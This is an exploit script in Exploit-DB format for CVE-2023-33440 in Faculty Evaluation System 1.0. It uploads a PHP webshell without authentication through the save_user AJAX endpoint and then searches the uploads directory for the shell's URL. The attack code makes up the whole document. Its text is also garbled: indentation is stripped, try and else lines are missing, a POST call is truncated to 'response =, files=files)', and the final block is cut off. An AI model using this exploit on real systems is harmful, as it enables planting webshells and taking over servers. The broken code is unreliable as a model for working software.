# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload  
# Date: 5/29/2023  
# Author: Alex Gan  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6  
# CVE: CVE-2023-33440  
# References:  
#!/usr/bin/env python3  
import os  
import sys  
import requests  
import argparse  
from bs4 import BeautifulSoup  
from urllib.parse import urlparse  
from requests.exceptions import ConnectionError, Timeout  
def get_args():  
parser = argparse.ArgumentParser()  
parser.add_argument('-u', '--url', type=str, help='URL')  
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')  
return parser.parse_args()  
def get_user_input(args):  
if not (args.url):  
args.url = input('Use the -u argument or Enter URL:')  
if not (args.payload):  
args.payload = input('Use the -p argument or Enter file path PHP webshell: ')  
return args.url, args.payload  
def check_input_url(url):  
parsed_url = urlparse(url)  
if not parsed_url.scheme:  
url = 'http://' + url  
if parsed_url.path.endswith('/'):  
url = url.rstrip('/')  
return url  
def check_host_availability(url):  
response = requests.head(url=url + '/login.php')  
if response.status_code == 200:  
print("[+] Host is accessible")  
print("[-] Host is not accessible")  
print(" Status code:", response.status_code)  
except (ConnectionError, Timeout) as e:  
print("[-] Host is not accessible")  
except requests.exceptions.RequestException as e:  
print("[-] Error:", e)  
def make_request(url, method, files=None):  
if method == 'GET':  
response = requests.get(url)  
elif method == 'POST':  
response =, files=files)  
raise ValueError(f'Invalid HTTP method: {method}')  
if response.status_code == 200:  
print('[+] Request successful')  
return response.text  
print(f'[-] Error {response.status_code}: {response.text}')  
return None  
def find_file(response_get, filename, find_url):  
soup = BeautifulSoup(response_get, 'html.parser')  
links = soup.find_all('a')  
found_files = []  
for link in links:  
file_upl = link.get('href')  
if file_upl.endswith(filename):  
if found_files:  
print(' File found:')  
for file in found_files:  
print('[*] ' + file)  
print(' Full URL of your file:')  
for file_url in found_files:  
print('[*] ' + find_url + file_url)  
print('[-] File not found')  
def main():  
args = get_args()  
url, payload = get_user_input(args)  
url = check_input_url(url)  
post_url = url + "/ajax.php?action=save_user"  
get_url = url + "/assets/uploads/"  
filename = os.path.basename(payload)  
payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]  
print(" Loading payload file")  
make_request(post_url, 'POST', files=payload_file)  
print(" Listing the uploads directory")  
response_get = make_request(get_url, 'GET')  
print(" Finding the downloaded payload file")  
find_file(response_get, filename, get_url)  
if __name__ == "__main__":